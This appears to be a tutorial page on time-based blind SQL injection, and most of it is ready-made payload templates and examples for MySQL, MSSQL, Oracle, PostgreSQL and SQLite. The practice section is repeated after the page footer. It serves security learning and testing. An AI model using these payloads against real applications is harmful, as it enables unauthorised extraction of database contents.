Time Based

Theory

Time-based SQL injection is a technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE.

Practice

The process is relatively the same as injection. All you have to do is modify the payloads to force the database to wait.

A time-based SQLi payload in MySQL will look like this

1'; SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')-- -

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(database()))=1-- -

#Time Based  
1'; SELECT IF((SELECT LENGTH(database()))=1,SLEEP(10),'a')-- -

A time-based SQLi payload in MSSQL will look like this

1' IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'--

Examples:

#Boolean Based  
1' AND (SELECT LEN(DB_NAME()))=1--

#Time Based  
1' IF ((SELECT LEN(DB_NAME()))=1) WAITFOR DELAY '0:0:10'--

A time-based SQLi payload in OracleSQL will look like this

1' || (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(global_name) FROM global_name)=1--

#Time Based  
1' || (SELECT CASE WHEN ((SELECT LENGTH(global_name) FROM global_name)=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

A time-based SQLi payload in PostgreSQL will look like this

1'; SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(current_database()))=1--

#Time Based  
1'; SELECT CASE WHEN ((SELECT LENGTH(current_database()))=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--

A time-based SQLi payload in SQLite will look like this

1' AND CASE WHEN (YOUR-CONDITION-HERE) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--

Examples:

#Boolean Based  
1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')--

#Time Based  
1' AND CASE WHEN ((SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--

Last updated 1 year ago

Was this helpful?

Practice

The process is relatively the same as injection. All you have to do is modify the payloads to force the database to wait.

A time-based SQLi payload in MySQL will look like this

1'; SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')-- -

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(database()))=1-- -

#Time Based  
1'; SELECT IF((SELECT LENGTH(database()))=1,SLEEP(10),'a')-- -

A time-based SQLi payload in MSSQL will look like this

1' IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'--

Examples:

#Boolean Based  
1' AND (SELECT LEN(DB_NAME()))=1--

#Time Based  
1' IF ((SELECT LEN(DB_NAME()))=1) WAITFOR DELAY '0:0:10'--

A time-based SQLi payload in OracleSQL will look like this

1' || (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(global_name) FROM global_name)=1--

#Time Based  
1' || (SELECT CASE WHEN ((SELECT LENGTH(global_name) FROM global_name)=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual) ||--

A time-based SQLi payload in PostgreSQL will look like this

1'; SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END--

Examples:

#Boolean Based  
1' AND (SELECT LENGTH(current_database()))=1--

#Time Based  
1'; SELECT CASE WHEN ((SELECT LENGTH(current_database()))=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--

A time-based SQLi payload in SQLite will look like this

1' AND CASE WHEN (YOUR-CONDITION-HERE) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--

Examples:

#Boolean Based  
1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')--

#Time Based  
1' AND CASE WHEN ((SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')) THEN 1 ELSE UPPER(HEX(RANDOMBLOB(1000000000/2))) END--